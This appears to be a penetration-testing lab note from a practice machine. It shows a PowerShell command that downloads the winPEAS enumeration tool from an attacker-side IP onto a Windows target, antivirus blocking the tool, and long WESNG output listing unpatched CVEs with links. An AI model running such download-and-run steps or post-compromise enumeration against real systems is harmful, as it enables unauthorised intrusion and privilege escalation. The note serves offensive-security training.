PEAS
Conducting an automated enumeration after performing a manual enumeration
PS C:\tmp> iwr -Uri http://192.168.45.235/winPEASany_ofs.exe -OutFile C:\tmp\winPEASany_ofs.exeDelivery complete
PS C:\tmp> .\winPEASany_ofs.exe
Program 'winPEASany_ofs.exe' failed to run: Operation did not complete successfully because the file contains a virus or potentially
unwanted softwareAt line:1 char:1
+ .\winPEASany_ofs.exe
+ ~~~~~~~~~~~~~~~~~~~~.
At line:1 char:1
+ .\winPEASany_ofs.exe
+ ~~~~~~~~~~~~~~~~~~~~
+ CategoryInfo : ResourceUnavailable: (:) [], ApplicationFailedException
+ FullyQualifiedErrorId : NativeCommandFailedFailed executing PEAS due to the AV
WESNG
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hokkaido]
└─$ wes --update ; wes sysinfo --exploits-only --hide "Internet Explorer" Edge Flash
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Updating definitions
[+] Obtained definitions created at 20250425
WARNING:root:chardet module not installed. In case of encoding errors, install chardet using: pip3 install chardet
Windows Exploit Suggester 1.03 ( https://github.com/bitsadmin/wesng/ )
[+] Parsing systeminfo output
[+] Operating System
- Name: Windows Server 2022
- Generation: 2022
- Build: 20348
- Version: 21H2
- Architecture: x64-based
- Installed hotfixes (3): KB5031993, KB5032198, KB5032310
[+] Loading definitions
- Creation date of definitions: 20250425
[+] Determining missing patches
[+] Filtering duplicate vulnerabilities
[+] Applying display filters
[!] Found vulnerabilities!
Date: 20240910
CVE: CVE-2024-38217
KB: KB5042880
Title: Windows Mark of the Web Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Mark of the Web (MOTW)
Severity: Important
Impact: Security Feature Bypass
Exploit: https://www.elastic.co/security-labs/dismantling-smart-app-control
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB5053638
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250311
CVE: CVE-2025-26633
KB: KB
Title: Microsoft Management Console Security Feature Bypass Vulnerability
Affected product: Windows Server 2022
Affected component: Microsoft Management Console
Severity: Important
Impact: Security Feature Bypass
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-26633-security-feature-bypass-in-microsoft-management-console-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055526
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055526
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055526
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055526
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055527
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022, 23H2 Edition (Server Core installation)
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250409
CVE: CVE-2025-29824
KB: KB5055527
Title: Windows Common Log File System Driver Elevation of Privilege Vulnerability
Affected product: Windows Server 2022, 23H2 Edition (Server Core installation)
Affected component: Windows Common Log File System Driver
Severity: Important
Impact: Elevation of Privilege
Exploits: https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-detection-script, https://www.vicarius.io/vsociety/posts/cve-2025-29824-windows-common-log-file-system-driver-elevation-of-privilege-vulnerability-mitigation-script
Date: 20250415
CVE: CVE-2023-44487
KB: KB
Title: MITRE: CVE-2023-44487 HTTP/2 Rapid Reset Attack
Affected product: Windows Server 2022
Affected component: HTTP/2
Severity: Important
Impact: Denial of Service
Exploits: https://github.com/micrictor/http2-rst-stream, https://github.com/micrictor/http2-rst-stream, https://security.netapp.com/advisory/ntap-20240621-0006/, https://security.netapp.com/advisory/ntap-20240621-0006/
Date: 20230815
CVE: CVE-2023-20569
KB: KB5029367
Title: AMD: CVE-2023-20569 Return Address Predictor
Affected product: Windows Server 2022
Affected component: Microsoft Windows
Severity: Important
Impact: Information Disclosure
Exploits: https://comsec.ethz.ch/research/microarch/inception/, https://comsec.ethz.ch/research/microarch/inception/
Date: 20231114
CVE: CVE-2023-38039
KB: KB
Title: Hackerone: CVE-2023-38039 HTTP headers eat all memory
Affected product: Windows Server 2022
Affected component: Windows cURL Implementation
Severity: Low
Impact: Denial of Service
Exploits: https://hackerone.com/reports/2072338, https://hackerone.com/reports/2072338
[-] Missing patches: 6
- KB: patches 10 vulnerabilities
- KB5055526: patches 4 vulnerabilities
- KB5055527: patches 2 vulnerabilities
- KB5042880: patches 1 vulnerability
- KB5053638: patches 1 vulnerability
- KB5029367: patches 1 vulnerability
[I] KB with the most recent release date
- ID: KB
- Release date: 20250415
[+] Done. Displaying 19 of the 3072 vulnerabilities found.